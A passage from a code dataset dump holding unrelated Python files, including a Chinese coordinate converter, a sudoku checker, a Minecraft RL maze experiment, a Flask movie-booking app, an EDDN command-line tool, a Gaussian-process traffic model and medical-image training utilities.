sqrt_x\r\n        y_add = -100 + 2 * x + 3 * y + 0.2 * y * y + 0.1 * x * y + 0.2 * sqrt_x\r\n        t_x = (20 * math.sin(6 * x * math.pi) + 20 * math.sin(2 * x * math.pi)) * 2 / 3\r\n        x_add += t_x\r\n        y_add += t_x\r\n        x_add += (20 * math.sin(x * math.pi) + 40 * math.sin(x / 3 * math.pi)) * 2 / 3\r\n        y_add += (20 * math.sin(y * math.pi) + 40 * math.sin(y / 3 * math.pi)) * 2 / 3\r\n        x_add += (150 * math.sin(x / 12 * math.pi) + 300 * math.sin(x / 30 * math.pi)) * 2 / 3\r\n        y_add += (160 * math.sin(y / 12 * math.pi) + 320 * math.sin(y * math.pi / 30)) * 2 / 3\r\n        return x_add, y_add\r\n\r\n    @classmethod\r\n    def in_china(cls, longitude, latitude):\r\n        \"\"\"\r\n        判断是否在国内,不在国内不做偏移\r\n\r\n        :param longitude: 经度\r\n        :param latitude: 纬度\r\n        :return: 坐标是否在中国\r\n        \"\"\"\r\n        return 72.004 < longitude < 137.8347 and 0.8293 < latitude < 55.8271\r\n","repo_name":"007gzs/lbs","sub_path":"lbs/core/coord_convert.py","file_name":"coord_convert.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23852789971","text":"test_col = False\ntest_row = False\nboard = []\nfor i in range(1, 10):\n    play_val = input(\"Enter your play: \")\n    board.append(list(play_val))\nfor entries in board:\n    print(entries)\nfor col in range(0, 9):\n    col_check = []\n    col_total = 0\n    for row in range(0, 9):\n        col_check.append(board[row][col])\n    for element in col_check:\n        col_total += int(element)\n    if col_total == 45:\n        test_col = True\n        continue\n    else:\n        test_col = False\n        print(\"No\")\n        print(\"Error in column\", col+1)\n        break\nfor row in range(0, 9):\n    row_check = []\n    row_total = 0\n    for col in range(0, 9):\n        row_check.append(board[row][col])\n    for element in row_check:\n        row_total += int(element)\n    if row_total == 45:\n        test_row = True\n        continue\n    else:\n        test_row = False\n        print(\"No\")\n        print(\"Error in row\", row+1)\n        break\ncol_start = 0\nrow_start = 0\ncol_end = 3 \nrow_end = 3\ntest_sect = False\n\nfor line in range(0, 9):\n    sect_check = []\n    sect_total = 0\n    if line == 
1:\n col_start = 3\n col_end = 6\n elif line == 2:\n col_start = 6\n col_end = 9\n elif line == 3:\n row_start = 3\n row_end = 6\n col_start =0\n col_end = 3\n elif line ==4:\n col_start =3\n col_end = 6\n elif line == 5:\n col_start = 6\n col_end=9\n elif line == 6:\n row_start = 6\n row_end = 9\n col_start =0\n col_end = 3\n elif line ==7:\n col_start =3\n col_end = 6\n elif line == 8:\n col_start = 6\n col_end=9\n for col in range(col_start, col_end):\n for row in range(row_start, row_end):\n sect_check.append(board[row][col])\n print(\"===\"*5)\n print(sect_check)\n for elements in sect_check:\n sect_total += int(elements)\n print(sect_total)\n if sect_total == 45:\n test_sect = True\n continue\n else:\n test_sect=False\n print(\"No\")\n print(\"Error in section \", line+1)\n break\n\n\nif test_col and test_row and test_sect:\n print(\"Yes\")\n\n\n#invalid soduku\n\"\"\"\n195743862\n432865917\n876192543\n387459216\n612387495\n549216738\n763524189\n928671354\n254938671\n\"\"\"\n\n#Valid soduku\n\"\"\"\n295743861\n431865927\n876192543\n387459216\n612387495\n549216738\n763524189\n928671354\n154938672\n\"\"\"\n","repo_name":"abdamsab/Python-Dcoder-files","sub_path":"Soduku.py","file_name":"Soduku.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10441878195","text":"import numpy as np\nimport json\nfrom scipy import stats\n\nvocab = json.load(open(\"../VG-SGG-dicts-with-attri.json\", \"r\"))\nidx2lb = {int(k): v for k, v in vocab[\"idx_to_label\"].items()}\nlabelfeature = np.load(\"lb_feature.npy\")\nman_feature = labelfeature[78]\nfor i in range(150):\n other_feature = labelfeature[i]\n s = stats.pearsonr(man_feature, other_feature)\n print(idx2lb[i + 1])\n print(s)\n","repo_name":"wlxlatiao666/IETrans_test","sub_path":"graph_match/numpy_save.py","file_name":"numpy_save.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12807617598","text":"N = int(input())\nB = list(map(int, input().split()))\n\nA = []\n\ndef check(A, B, x):\n B.remove(x)\n A.append(x)\n\n if not B:\n return True\n if x * 2 in B:\n return check(A, B, x*2)\n if x % 3 == 0 and x // 3 in B:\n return check(A, B, x//3)\n return False\n\nfor i in range(N):\n A = []\n res = check(A, B.copy(), B[i])\n if res:\n print(*A)\n break\n","repo_name":"HJinS/AlgorithmPractice","sub_path":"AlgorithmMiddle/BruteForce/16936-re.py","file_name":"16936-re.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16475785080","text":"from agent import MineflayerAgent\nfrom dqn import DQNModel\nfrom visualnavigationmodel import VisualNavigationModel\n\nimport configuration\n\nfrom time import sleep\nimport torch\n\nimport maze_task\nimport maze\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nagent = MineflayerAgent(viewer_port = 3007,name = \"yzy1\")\n\nmodel = VisualNavigationModel(7)\n\nmymaze = maze.Maze(width=configuration.MAZE_SIZE, height=configuration.MAZE_SIZE, seed=configuration.MAZE_SEED)\n\nmaze_task.build_maze(agent, mymaze)\n\nfor r in range(5):\n maze_task.reset_task(agent, mymaze)\n agent.bot.chat(\"Round \" + str(r))\n agentpov = agent.get_image()\n state=torch.tensor(agentpov.flatten(),dtype=torch.float32, device=device)\n last_action = torch.zeros([1,1], dtype=torch.float32, device=device)\n 
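    # added comment: the navigation model is recurrent over (observation,
    # previous action, previous reward), so both conditioning inputs are
    # zeroed at the start of each round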
last_reward = torch.zeros([1,1], dtype=torch.float32, device=device)\n for i in range(100):\n # bot actions\n action = model.get_result(state, last_action, last_reward)\n \n agent.apply_action(maze_task.generate_action(action))\n \n # wait for the actions\n sleep(.5)\n agent.stop_movement()\n\n # calculate rewards\n reward = maze_task.reward(agent, mymaze)\n reward = torch.tensor([[reward]], device=device)\n\n observation = agent.get_image()\n next_state = torch.tensor(observation.flatten(), dtype=torch.float32, device=device)\n\n # Store the transition in memory\n model.save_to_memory(state, int(action), next_state, reward, last_action, last_reward)\n\n # Move to the next state\n state = next_state\n last_action = torch.tensor([[action]], device=device)\n last_reward = reward\n \n if i%10==9:\n msgtxt=str(r)+'-'+str(i)\n print(msgtxt,reward)\n\n # Perform one step of the optimization\n model.optimize()\n\nsleep(5)\n\nmaze_task.clear_maze(agent, mymaze)\n\n# model.save_network('RL_visualnavigation.pt')\n\ndel agent","repo_name":"Kallikalev/minecraftRL","sub_path":"experiment_maze.py","file_name":"experiment_maze.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5367131402","text":"from contextlib import _RedirectStream\nfrom flask import Flask,render_template,request\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = 'mysql+pymysql://root:@localhost/Movies'\ndb = SQLAlchemy(app)\n\nclass Booking_details(db.Model):\n sno = db.Column(db.Integer, primary_key=True)\n name=db.Column(db.String(50), nullable=False)\n email=db.Column(db.String(20),nullable=False)\n phone=db.Column(db.String,nullable=False)\n date=db.Column(db.String,nullable=False)\n time=db.Column(db.String,nullable=False)\n no_of_tickets=db.Column(db.Integer,nullable=False)\n movie=db.Column(db.String(50), nullable=False)\n \n\n@app.route(\"/\")\ndef home():\n return render_template('index.html')\n\n@app.route(\"/booking\", methods=['GET','POST'])\ndef booking():\n if(request.method=='POST'):\n name=request.form.get('name')\n email=request.form.get('email')\n phone=request.form.get('phone')\n date=request.form.get('date')\n time=request.form.get('time')\n no_of_tickets=request.form.get('no_of_tickets')\n movie=request.form.get('movie')\n\n entry=Booking_details(name=name,email=email,phone=phone,date=date,time=time,no_of_tickets=no_of_tickets,movie=movie)\n db.session.add(entry)\n db.session.commit()\n return render_template('seatbook.html')\n return render_template('booking.html')\n\n@app.route(\"/seatbook\")\ndef seatbook():\n return render_template('seatbook.html')\n\n\n@app.route(\"/confirm\")\ndef confirm():\n return render_template('confirm.html')\n\n\n\n\napp.run(debug=True)\n","repo_name":"Varsha-7007/Movies4You.github.io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33610385586","text":"from pyspark.sql import SparkSession\n\n# 创建SparkSession\nspark = SparkSession.builder.appName(\"JsonParsingApp\").master(\"local[*]\").getOrCreate()\n\n# 读取本地文件\ninput_path = \"file:///Users/tangqiliang/Documents/files/openapi_logs/jsons/1102/1\"\ndf = spark.read.json(input_path)\ndf.createOrReplaceTempView(\"my_json\")\n\n# 进行数据清洗和处理\ncleaned_df = spark.sql(\"\"\"\n select \n data.company_id,\n data.suite_id, \n 
data.app_type,\n cast((`@filebeat_time` / 1000) as bigint) as t,\n data.response_code,\n replace(to_date(`@timestamp`),'-','') as access_date,\n from_unixtime(unix_timestamp(`@timestamp`, 'yyyy-MM-dd HH:mm:ss.SSS'), 'HH') as `hour`\n from my_json\n\"\"\")\n\n# cleaned_df.show()\n\n# 将数据写回本地文件\noutput_path = \"file:///Users/tangqiliang/Documents/files/openapi_logs/results/1102\"\ncleaned_df.repartition(3).write. \\\n mode(\"overwrite\"). \\\n format(\"parquet\"). \\\n save(output_path)\n\n# 停止SparkSession\nspark.stop()\n","repo_name":"tqllorry/tencentParse","sub_path":"openapi_logs/input_output_json.py","file_name":"input_output_json.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73432129003","text":"from .. import ERRORS\nfrom .. import __app_name__\nfrom .. import __version__\nfrom ..config import CONFIG_FILE_PATH\nfrom ..config import DEFAULT_CONFIG\nfrom ..config import load_config\nfrom configparser import ConfigParser\nfrom io import StringIO\nfrom logging.config import dictConfig\nfrom pathlib import Path\nfrom typing import Annotated\nfrom typing import Optional\nimport importlib\nimport logging\nimport pkgutil\nimport typer\n\n# configure module-level logging\nlogger = logging.getLogger(__name__)\n\n# create the CLI\napp = typer.Typer()\n\n# build a list of submodules\n__path__ = pkgutil.extend_path(__path__, __name__) # noqa: F821\n_submodules = [\n _modname\n for _importer, _modname, _ispkg in pkgutil.walk_packages(\n path=__path__, prefix=__name__ + \".\"\n )\n]\n\n# load submodules and add them as CLI subcommands\nfor _submodule in _submodules:\n _mdl = importlib.import_module(_submodule)\n\n # respect the module's external symbol list if present\n if \"__all__\" in _mdl.__dict__:\n _mdl_names = _mdl.__dict__[\"__all__\"]\n else:\n _mdl_names = [_sym for _sym in _mdl.__dict__]\n\n if \"app\" in _mdl_names:\n _subcommand = getattr(_mdl, \"app\")\n if \"help\" in _mdl_names:\n _help = getattr(_mdl, \"help\")\n else:\n _help = None\n if isinstance(_subcommand, typer.Typer):\n app.add_typer(_subcommand, name=_submodule.split(\".\")[-1], help=_help)\n\n\n@app.command()\ndef listen() -> None:\n \"\"\"Connect to the Elite Dangerous Data Network (EDDN).\"\"\"\n pass\n\n\ndef _version_callback(value: bool) -> None:\n if value:\n typer.echo(\n f\"{__app_name__} {__version__}, a free/libre/open source client for EDDN (and more)\"\n )\n typer.echo(\"Copyright (C) 2023 Matthew X. 
Economou\")\n typer.echo(\n \"License AGPLv3+: GNU AGPL version 3 or later .\"\n )\n typer.echo(\n \"Source code for this version can be found at .\"\n )\n raise typer.Exit()\n\n\n@app.callback()\ndef main(\n ctx: typer.Context,\n config_file: Annotated[\n Optional[Path],\n typer.Option(\n \"--config\",\n \"-f\",\n help=\"Override the default configuration file.\",\n ),\n ] = CONFIG_FILE_PATH,\n init_file: Annotated[\n Optional[Path],\n typer.Option(\n \"--init\",\n \"-i\",\n help=\"Override the default initialization file.\",\n ),\n ] = None,\n debug: Annotated[\n Optional[bool],\n typer.Option(\n \"--debug\",\n \"-d\",\n help=\"Enable detailed activity tracing.\",\n ),\n ] = None,\n quiet: Annotated[\n Optional[bool],\n typer.Option(\n \"--quiet\",\n \"-q\",\n help=\"Silence all program output.\",\n ),\n ] = None,\n verbose: Annotated[\n Optional[bool],\n typer.Option(\n \"--verbose\",\n \"-v\",\n help=\"Include backtraces in error messages.\",\n ),\n ] = None,\n version: Annotated[\n Optional[bool],\n typer.Option(\n \"--version\",\n help=\"Show the application's version and exit.\",\n callback=_version_callback,\n is_eager=True,\n ),\n ] = None,\n) -> None:\n ctx.obj = {} # user-defined shared state\n\n # configure logging\n dictConfig(\n {\n \"version\": 1,\n \"formatters\": {\n \"default\": {\n \"format\": \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n },\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"default\",\n },\n },\n \"loggers\": {\n \"alembic\": {\n \"level\": \"DEBUG\",\n \"propagate\": 1,\n },\n \"lethbridge\": {\n \"level\": \"DEBUG\",\n \"propagate\": 1,\n },\n \"sqlalchemy.engine\": {\n \"level\": \"DEBUG\",\n \"propagate\": 1,\n },\n },\n \"root\": {\n \"level\": \"DEBUG\" if debug else \"INFO\" if verbose else \"WARNING\",\n \"handlers\": [\"console\"] if not quiet else [],\n },\n }\n )\n\n # copy the default configuration\n config_string = StringIO()\n DEFAULT_CONFIG.write(config_string)\n config_string.seek(0)\n app_cfg = ConfigParser()\n app_cfg.read_file(config_string)\n\n # load the configuration file (overwrites the defaults)\n load_config_error = load_config(config_file, app_cfg)\n if load_config_error:\n typer.secho(ERRORS[load_config_error], fg=typer.colors.RED)\n raise typer.Exit(load_config_error)\n\n # pass global state like application configuration to other parts\n # of the UI via Typer's/Click's context object\n ctx.obj[\"config_file\"] = config_file\n ctx.obj[\"app_cfg\"] = app_cfg\n\n # run the initialization file\n if not init_file:\n init_file = app_cfg[\"cli\"][\"init_file\"]\n try:\n exec(compile(open(init_file, \"rb\").read(), init_file, \"exec\"))\n except FileNotFoundError as e:\n logger.debug(e)\n except Exception as e:\n logger.warning(e)\n return\n","repo_name":"irtnog/lethbridge","sub_path":"src/cli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41389690732","text":"\"\"\"Module to contain the GP Model Class\"\"\"\n\nimport tensorflow as tf\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport pandas as pd\nimport numpy as np\n\nimport gpflow\n\n# from gpflow.utilities import print_summary, set_trainable\n\nimport joblib\n\n\nclass GPLandscape:\n \"\"\"Class which manages the training, saving and loading of GP models for an array of detectors\"\"\"\n\n def __init__(self):\n self.models = None\n self.model_last_update_start = None\n 
self.model_last_update_end = None\n self.model_detector_id = None\n self.scalers = None\n\n def train_save_detector(\n self, scoot_df: pd.DataFrame, days_in_past: int, detector: str, kern=None\n ):\n \"\"\"Trains GP a to one detector, using a SCOOT dataframe format. The trained model is\n then saved in a directory along with other useful model data such as scalers\n Args:\n df: SCOOT dataframe of one detector used for training\n days_in_past: how many most recent days of past dataframe should be used for training\n detector: detector_id as string\n kern: Optional kernel choice\n Returns:\n last_update_start: date for which the detector was trained\n det: name of detector\n \"\"\"\n\n # set Y and X to our days_in_past used for fitting, reshape, and scale\n det = scoot_df[\"detector_id\"].unique()[0]\n Y = (\n scoot_df[\"n_vehicles_in_interval\"]\n .tail(n=24 * days_in_past)\n .to_numpy()\n .reshape(-1, 1)\n )\n last_update_start = (\n scoot_df[\"measurement_end_utc\"].tail(n=24 * days_in_past).min()\n )\n last_update_end = (\n scoot_df[\"measurement_end_utc\"].tail(n=24 * days_in_past).max()\n )\n Y = Y.astype(float)\n X = np.arange(1, len(Y) + 1, dtype=float).reshape(-1, 1)\n\n scaler = MinMaxScaler(feature_range=(-1, 1))\n y = scaler.fit_transform(Y)\n\n # iniialise kernel\n if kern is None:\n\n kern_pd = gpflow.kernels.Periodic(gpflow.kernels.SquaredExponential())\n kern_pw = gpflow.kernels.Periodic(gpflow.kernels.SquaredExponential())\n kern_se = gpflow.kernels.SquaredExponential()\n\n kern_pd.period.assign(24.0)\n kern_pw.period.assign(168.0)\n # kern_SE.lengthscales.assign(100)\n\n k = kern_pd * kern_pw + kern_se\n else:\n k = kern\n\n # fit our GP to X & y\n model = gpflow.models.GPR(data=(X, y), kernel=k, mean_function=None)\n opt = gpflow.optimizers.Scipy()\n\n # optimise GP performance\n opt.minimize(\n model.training_loss, model.trainable_variables, options=dict(maxiter=100)\n )\n\n # save model as TF module under detector name\n frozen_model = gpflow.utilities.freeze(model)\n module_to_save = tf.Module()\n predict_fn = tf.function(\n frozen_model.predict_f,\n input_signature=[tf.TensorSpec(shape=[None, 1], dtype=tf.float64)],\n )\n module_to_save.predict = predict_fn\n\n # save path\n save_dir = str(\"gp_models/\" + detector + \"/\")\n tf.saved_model.save(module_to_save, save_dir)\n\n scaler_filename = str(save_dir + \"scaler.gz\")\n joblib.dump(scaler, scaler_filename)\n\n return last_update_start, last_update_end, det\n\n def train_save_landscape(self, scoot_df: pd.DataFrame, days_in_past: int):\n \"\"\"Trains GPs to multiple detectors passed to it in SCOOT dataframe format. 
Trained models are\n saved in directories\n\n Args:\n scoot_df: SCOOT dataframe used to train multiple detector models\n days_in_past: how manyt most recent days of past dataframe should be used for training\n \"\"\"\n\n detectors = scoot_df[\"detector_id\"].unique()\n\n last_update_starts = []\n last_update_ends = []\n saved_detectors = []\n\n for i, detector in enumerate(detectors, 1):\n single_detector_df = scoot_df[scoot_df[\"detector_id\"] == detector]\n\n try:\n date, end_date, det = self.train_save_detector(\n single_detector_df, days_in_past, detector\n )\n except:\n print(detector, \" Matrix not invertible\")\n continue\n\n last_update_starts.append(date)\n last_update_ends.append(end_date)\n saved_detectors.append(det)\n print(\"please wait: \", i, \"/\", len(detectors), end=\"\\r\")\n\n pd.DataFrame(\n {\n \"detectors\": saved_detectors,\n \"last_update_start\": last_update_starts,\n \"last_update_end\": last_update_ends,\n }\n ).to_csv(\"gp_models/det_date.csv\", index=False)\n\n def load_landscape(self):\n \"\"\"Loads array of pre-trained models and model data as arays from file, and\n sets them to the class variable\"\"\"\n\n models = []\n scalers = []\n\n det_date = pd.read_csv(\"gp_models/det_date.csv\", index_col=False)\n detectors = det_date[\"detectors\"].to_numpy()\n dates = det_date[\"last_update_start\"].astype(\"datetime64[h]\").to_numpy()\n end_dates = det_date[\"last_update_start\"].astype(\"datetime64[h]\").to_numpy()\n\n for i, detector in enumerate(detectors, 1):\n\n save_dir = str(\"gp_models/\" + detector + \"/\")\n scaler_filename = str(save_dir + \"scaler.gz\")\n models.append(tf.saved_model.load(save_dir))\n scalers.append(joblib.load(scaler_filename))\n print(\"please wait: \", i, \"/\", len(detectors), end=\"\\r\")\n\n self.models = models\n self.model_detector_id = detectors\n self.model_last_update_start = dates\n self.model_last_update_end = end_dates\n self.scalers = scalers\n\n def count_baseline(\n self, scoot_df: pd.DataFrame, detectors: list = None\n ) -> pd.DataFrame:\n \"\"\"Produces a DataFrame where the count and baseline can be compared for use\n in scan statistics\n\n Args:\n scoot_df: Dataframe of processed SCOOT data which we want to compare to model\n detectors: List of detectors to compare to forecasts. 
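                Detectors with no saved model on disk are dropped from the
                comparison (the skipped ids are printed).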
Default behaviour\n retrieves forecasts for all detectors present in input dataframe.\n\n Returns:\n forecast_df: Dataframe of SCOOT vehicle counts and baseline estimates\"\"\"\n\n pd.options.mode.chained_assignment = None\n\n if detectors is None:\n detectors = scoot_df[\"detector_id\"].drop_duplicates().to_numpy()\n\n detectors_in=np.intersect1d(detectors, self.model_detector_id)\n if(detectors_in!=detectors):\n print(\"No saved models for: \", np.setdiff1d(detectors, detectors_in))\n print(\"Calculating for remaining detectors...\")\n detectors=detectors_in\n\n\n framelist = []\n\n for i, detector in enumerate(detectors, 1):\n print(\"please wait: \", i, \"/\", len(detectors), end=\"\\r\")\n\n one_detector_df = scoot_df.loc[scoot_df[\"detector_id\"] == detector]\n\n start_of_trained_data = self.model_last_update_start[\n np.where(self.model_detector_id == detector)\n ]\n\n baseline_range = (\n (one_detector_df[\"measurement_end_utc\"] - start_of_trained_data[0])\n .to_numpy()\n .astype(\"timedelta64[h]\")\n )\n baseline_range = baseline_range + np.timedelta64(1, \"h\")\n\n loc = np.where(self.model_detector_id == detector)\n\n baseline_range = baseline_range.reshape(-1, 1)\n model = self.models[loc[0][0]]\n scaler = self.scalers[loc[0][0]]\n\n mean, var = model.predict(baseline_range)\n mean = scaler.inverse_transform(mean)\n var = scaler.inverse_transform(var)\n\n one_detector_df.rename(\n columns={\"n_vehicles_in_interval\": \"count\"}, inplace=True,\n )\n\n one_detector_df = one_detector_df.assign(baseline=mean.flatten().tolist())\n one_detector_df = one_detector_df.assign(\n upper_99=(3 * np.sqrt(var.flatten()) + mean.flatten()).tolist()\n )\n one_detector_df = one_detector_df.assign(\n lower_99=(mean.flatten() - 3 * np.sqrt(var.flatten())).tolist()\n )\n one_detector_df = one_detector_df.assign(\n prediction_variance=var.flatten().tolist()\n )\n\n framelist.append(one_detector_df)\n\n return pd.concat(framelist)\n","repo_name":"TeddyTW/SpatialScan","sub_path":"SpatialScan/scoot_gp.py","file_name":"scoot_gp.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39315501603","text":"a1 = list(map(int, input().split()))\na2 = list(map(int, input().split()))\na3 = list(map(int, input().split()))\na = []\na.append(a1)\na.append(a2)\na.append(a3)\nbingo = [[0] * 3 for i in range(3)]\nn = int(input())\nfor i in range(n):\n b = int(input())\n for j in range(3):\n for h in range(3):\n if a[j][h] == b:\n bingo[j][h] = 1\nfor i in range(3):\n if bingo[i][0] + bingo[i][1] + bingo[i][2] == 3:\n print(\"Yes\")\n quit()\n elif bingo[0][i] + bingo[1][i] + bingo[2][i] == 3:\n print(\"Yes\")\n quit()\nif (\n bingo[0][0] + bingo[1][1] + bingo[2][2] == 3\n or bingo[0][2] + bingo[1][1] + bingo[2][0] == 3\n):\n print(\"Yes\")\n quit()\nprint(\"No\")\n","repo_name":"Lotka-Volterra/ABC","sub_path":"ABC151-175/abc157/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29890911916","text":"from torchvision import transforms\nfrom PIL import Image\nimport glob\nimport torch\nimport cv2\nimport numpy as np\nimport os\nimport csv\nfrom pathlib import Path\nimport torch.nn as nn\nimport math\nimport time\nimport random\nfrom tools.visualizer import RedundancyVisualizer\nimport pandas as pd\nfrom tools.draw_plot import AvgPlot\nfrom Config import ConfigBase\nfrom numpy import 
\n\nclass SaveLastModel(object):\n    '''\n    save the newest parameters\n    '''\n    def __init__(self, fold: int, save_path: str):\n        self.save_path = save_path\n        self.pth_last = \"not_exists\"\n        self.fold = str(fold)\n        Path(save_path).mkdir(parents=True, exist_ok=True)\n        self.savethread = None\n\n    def update(self, model_now: nn.Module, epoch_now: int):\n        self.pth_now = os.path.join(self.save_path, \"Model-fold-{}-state-{}.pth\".format(self.fold, epoch_now))\n        Path(self.pth_last).unlink(missing_ok=True)\n        if isinstance(model_now, nn.DataParallel):\n            model_now = model_now.module\n\n        model_now = deepcopy(model_now.state_dict())\n        self.savethread.join() if self.savethread is not None else ...\n        self.savethread = saveThread(model_now, self.pth_now)\n        self.savethread.start()\n\n        self.pth_last = self.pth_now\n\n\nclass RecordRes(object):\n    def __init__(self, fold: int, log_path: str = None):\n        self.fold = fold\n        if log_path:\n            self.log_path = os.path.join(log_path, \"csv\", str(fold))\n            Path(self.log_path).mkdir(parents=True, exist_ok=True)\n            self.log_path = os.path.join(log_path, \"csv\", str(fold), \"Record_acc_auc_kappa.csv\")\n            Path(self.log_path).touch(exist_ok=True)\n            _ = open(self.log_path, 'w').close()\n            self.csv_file = open(self.log_path, \"w\")\n            self.writer = csv.writer(self.csv_file)\n\n    def update(self, acc_now: float, auc_now: float, kappa_now: float):\n        self.writer.writerow([float(acc_now), float(auc_now), float(kappa_now)])\n\n    def close(self):\n        try:\n            self.csv_file.close()\n        except Exception:\n            pass\n\n    def __del__(self):\n        self.close()\n\n\nclass RecordBestRes(object):\n    def __init__(self, fold: int, log_path: str, first: str = \"acc\", is_save_model: bool = True):\n        self.MAX_ACC = -1.0\n        self.MAX_AUC = -1.0\n        self.MAX_KAP = -1.0\n        self.Epoch = -1\n        self.first = first.lower()\n        self.fold = fold\n        self.is_save_model = is_save_model\n\n        Path(log_path).mkdir(parents=True, exist_ok=True)\n        self.log_path = os.path.join(log_path, \"RecordBestRes.log\")\n        self.pth_path = os.path.join(log_path, \"Model-fold-{}-First-{}.pth\".format(self.fold, self.first))\n        Path(self.log_path).touch(exist_ok=True)\n        self.savethread = None\n\n    def update(self, model_now: nn.Module, epoch_now: int, acc_now: float, auc_now: float, kappa_now: float):\n        if self.first == \"acc\" or \"acc\" in self.first:\n            if acc_now > self.MAX_ACC:\n                self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n                return\n\n            if acc_now == self.MAX_ACC:\n                # bug fix: the inner test was acc_now >= self.MAX_ACC, which is\n                # always true here; a tie on acc should fall back to AUC\n                if auc_now >= self.MAX_AUC:\n                    self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n                return\n
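\n            # (added note) ties on the primary metric are broken by a\n            # secondary one: e.g. two epochs with equal accuracy keep the\n            # checkpoint with the higher AUC.\n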
\n        if self.first == \"auc\" or \"auc\" in self.first:\n            if auc_now > self.MAX_AUC:\n                self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n                return\n\n            if auc_now == self.MAX_AUC:\n                if acc_now >= self.MAX_ACC:\n                    self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n                return\n\n        if self.first == \"kappa\" or \"kap\" in self.first:\n            if kappa_now > self.MAX_KAP:\n                self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n                return\n\n            if kappa_now == self.MAX_KAP:\n                if acc_now >= self.MAX_ACC or auc_now >= self.MAX_AUC:\n                    self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n                return\n\n    def conclusion(self):\n        conclusion = \"Fold {}, {} first: Best ACC= {} AUC= {} Kappa= {} @ Epoch {} .\\n\".format(\n            self.fold, self.first, self.MAX_ACC, self.MAX_AUC, self.MAX_KAP, self.Epoch)\n        print(conclusion)\n\n        if self.log_path:\n            with open(self.log_path, \"a\") as file:\n                file.write(conclusion)\n        return conclusion\n\n    def __update(self, model_now: nn.Module, epoch_now: int, acc_now: float, auc_now: float, kap_now: float):\n        if epoch_now >= VALID_START_POINT:\n            self.MAX_ACC = acc_now\n            self.MAX_AUC = auc_now\n            self.MAX_KAP = kap_now\n            self.Epoch = epoch_now\n            if self.is_save_model:\n                Path(self.pth_path).unlink(missing_ok=True)\n                if isinstance(model_now, nn.DataParallel):\n                    model_now = model_now.module\n\n                # torch.save(model_now.state_dict(), self.pth_path)\n\n                model_now = deepcopy(model_now.state_dict())\n                self.savethread.join() if self.savethread is not None else ...\n                self.savethread = saveThread(model_now, self.pth_path)\n                self.savethread.start()\n\n        return self\n\n\nclass SaveCSV(object):\n    def __init__(self, csv_path: str, fold_num: int, epoch: int):\n        csv_dir = os.path.join(csv_path, \"csv\", str(fold_num))\n        Path(csv_dir).mkdir(parents=True, exist_ok=True)\n        self.csv_path = os.path.join(csv_dir, 'Joint-fold-{}-state-{}-Result.csv'.format(fold_num, epoch))\n        Path(self.csv_path).touch(exist_ok=True)\n        self.csv_file = open(self.csv_path, \"w\")\n        self.writer = csv.writer(self.csv_file)\n\n    def write(self, data: list):\n        self.writer.writerow(data)\n\n    def close(self):\n        try:\n            self.csv_file.close()\n        except Exception:\n            pass\n\n    def __del__(self):\n        self.close()\n\n\ndef extract_maximum_connected_area(mat, threshold: int = 110):\n    contours, _ = cv2.findContours(mat, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n    area = []\n    for j in range(len(contours)):\n        area.append(cv2.contourArea(contours[j]))\n\n    max_idx = np.argmax(area)\n    for k in range(len(contours)):\n        if k != max_idx:\n            cv2.fillPoly(mat, [contours[k]], 0)\n\n    _, mat = cv2.threshold(mat, threshold, 255, cv2.THRESH_BINARY)\n    return mat\n\n\ndef tensor2array(tensor):\n    array1 = tensor.cpu().detach().numpy()\n    maxValue = array1.max()\n    array1 = array1 * 255 / maxValue\n    mat = np.uint8(array1)\n    mat = mat.transpose(1, 2, 0)\n    mat = cv2.cvtColor(mat, cv2.COLOR_RGB2BGR)\n    mat = cv2.cvtColor(mat, cv2.COLOR_BGR2GRAY)\n    return mat\n\n\ndef get_concat_v(im1, im2, mod: str = \"L\"):\n    dst = Image.new(mod, (im1.width, im1.height + im2.height))\n    dst.paste(im1, (0, 0))\n    dst.paste(im2, (0, im1.height))\n    return dst\n\n\ndef os2od(img, mod: str = \"L\"):\n    width, height = img.size\n    im1 = img.crop((0, 0, width, height // 2))\n    im2 = img.crop((0, height // 2, width, height))\n    return get_concat_v(im2, im1, mod).transpose(Image.Transpose.FLIP_TOP_BOTTOM)\n\n\ndef os2od_list(images: list, mod: str = \"L\"):\n    images = [os2od(x, mod) for x in images]\n    return images\n\n\ndef array2image(array, mode: str = 
